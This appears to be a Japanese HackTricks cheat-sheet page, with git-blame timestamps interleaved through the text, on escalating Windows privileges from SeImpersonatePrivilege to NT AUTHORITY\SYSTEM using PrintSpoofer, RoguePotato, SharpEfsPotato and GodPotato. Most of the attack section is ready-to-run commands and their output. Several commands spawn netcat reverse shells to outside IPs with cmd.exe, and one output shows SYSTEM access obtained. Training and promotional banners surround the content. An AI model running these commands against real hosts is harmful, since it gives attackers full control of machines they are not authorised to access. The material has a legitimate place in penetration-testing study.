2023-04-13 22:25:26 +00:00
# RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato
2022-10-03 18:16:17 +00:00
2024-07-19 16:28:25 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Learn & practice GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-10-03 18:16:17 +00:00
2024-07-19 16:28:25 +00:00
< details >
2022-10-03 18:16:17 +00:00
2024-07-19 16:28:25 +00:00
< summary > Support HackTricks< / summary >
2024-01-02 22:36:59 +00:00
2024-07-19 16:28:25 +00:00
* Check the [**subscription plans** ](https://github.com/sponsors/carlospolop )!
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-10-03 18:16:17 +00:00
< / details >
2024-07-19 16:28:25 +00:00
{% endhint %}
2022-10-03 18:16:17 +00:00
2024-04-18 04:12:23 +00:00
### [WhiteIntel](https://whiteintel.io)
2024-04-18 03:40:36 +00:00
2024-05-05 23:08:22 +00:00
< figure > < img src = "../../.gitbook/assets/image (1227).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-18 03:40:36 +00:00
2024-07-19 16:28:25 +00:00
[**WhiteIntel** ](https://whiteintel.io )は、**ダークウェブ**を利用した検索エンジンで、企業やその顧客が**マルウェアに侵害された**かどうかを確認するための**無料**機能を提供しています。
2024-04-18 03:40:36 +00:00
2024-07-19 16:28:25 +00:00
WhiteIntelの主な目標は、情報を盗むマルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
2024-04-18 03:40:36 +00:00
2024-07-19 16:28:25 +00:00
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
2024-04-18 03:40:36 +00:00
{% embed url="https://whiteintel.io" %}
2024-05-05 23:08:22 +00:00
***
2024-04-18 03:40:36 +00:00
2022-10-03 18:16:17 +00:00
{% hint style="warning" %}
2024-07-19 16:28:25 +00:00
**JuicyPotatoは** Windows Server 2019およびWindows 10ビルド1809以降では機能しません。しかし、[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**、** [**RoguePotato** ](https://github.com/antonioCoco/RoguePotato )**、** [**SharpEfsPotato** ](https://github.com/bugch3ck/SharpEfsPotato )**、** [**GodPotato** ](https://github.com/BeichenDream/GodPotato )は、**同じ特権を利用して`NT AUTHORITY\SYSTEM`**レベルのアクセスを取得するために使用できます。この[ブログ記事](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)では、JuicyPotatoがもはや機能しないWindows 10およびServer 2019ホストでの偽装特権を悪用するために使用できる`PrintSpoofer`ツールについて詳しく説明しています。
2022-10-03 18:16:17 +00:00
{% endhint %}
2024-07-19 16:28:25 +00:00
## Quick Demo
2022-10-03 18:16:17 +00:00
### PrintSpoofer
```bash
c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
2023-07-07 23:42:27 +00:00
--------------------------------------------------------------------------------
2022-10-03 18:16:17 +00:00
2023-07-07 23:42:27 +00:00
[+] Found privilege: SeImpersonatePrivilege
2022-10-03 18:16:17 +00:00
2023-07-07 23:42:27 +00:00
[+] Named pipe listening...
2022-10-03 18:16:17 +00:00
2023-07-07 23:42:27 +00:00
[+] CreateProcessAsUser() OK
2022-10-03 18:16:17 +00:00
NULL
```
2023-11-05 22:41:08 +00:00
### RoguePotato
2023-07-07 23:42:27 +00:00
2023-11-05 22:41:08 +00:00
{% code overflow="wrap" %}
2022-10-03 18:16:17 +00:00
```bash
2023-11-05 22:41:08 +00:00
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
2022-10-03 18:16:17 +00:00
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
2024-02-08 03:59:37 +00:00
{% endcode %}
2022-10-22 12:26:54 +00:00
### SharpEfsPotato
```
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
2023-07-07 23:42:27 +00:00
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
2022-10-22 12:26:54 +00:00
2023-07-07 23:42:27 +00:00
Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0 .
2022-10-22 12:26:54 +00:00
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
C:\temp>type C:\temp\w.log
nt authority\system
```
2024-07-19 16:28:25 +00:00
### GodPotato
2023-04-13 22:25:26 +00:00
```
GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
```
2024-02-08 03:59:37 +00:00
## 参考文献
2024-05-05 23:08:22 +00:00
2024-02-08 03:59:37 +00:00
* [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/ ](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/ )
* [https://github.com/itm4n/PrintSpoofer ](https://github.com/itm4n/PrintSpoofer )
* [https://github.com/antonioCoco/RoguePotato ](https://github.com/antonioCoco/RoguePotato )
* [https://github.com/bugch3ck/SharpEfsPotato ](https://github.com/bugch3ck/SharpEfsPotato )
* [https://github.com/BeichenDream/GodPotato ](https://github.com/BeichenDream/GodPotato )
2024-04-18 04:12:23 +00:00
### [WhiteIntel](https://whiteintel.io)
2024-04-18 03:40:36 +00:00
2024-05-05 23:08:22 +00:00
< figure > < img src = "../../.gitbook/assets/image (1227).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-18 03:40:36 +00:00
2024-07-19 16:28:25 +00:00
[**WhiteIntel** ](https://whiteintel.io ) は、**ダークウェブ** に基づいた検索エンジンで、企業やその顧客が **スティーラーマルウェア** によって **侵害** されているかどうかを確認するための **無料** 機能を提供しています。
2024-04-18 03:40:36 +00:00
2024-07-19 16:28:25 +00:00
WhiteIntel の主な目標は、情報を盗むマルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
2024-04-18 03:40:36 +00:00
2024-07-19 16:28:25 +00:00
彼らのウェブサイトをチェックして、**無料** でエンジンを試すことができます:
2024-04-18 03:40:36 +00:00
{% embed url="https://whiteintel.io" %}
2024-07-19 16:28:25 +00:00
{% hint style="success" %}
AWS ハッキングを学び、練習する:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
GCP ハッキングを学び、練習する:< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-10-03 18:16:17 +00:00
2024-07-19 16:28:25 +00:00
< details >
2024-01-02 22:36:59 +00:00
2024-07-19 16:28:25 +00:00
< summary > HackTricksをサポートする< / summary >
2022-10-03 18:16:17 +00:00
2024-07-19 16:28:25 +00:00
* [**サブスクリプションプラン** ](https://github.com/sponsors/carlospolop )を確認してください!
* **💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f ) または [**Telegramグループ** ](https://t.me/peass ) に参加するか、**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**をフォローしてください。**
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) の GitHub リポジトリに PR を送信してください。**
2022-10-03 18:16:17 +00:00
< / details >
2024-07-19 16:28:25 +00:00
{% endhint %}
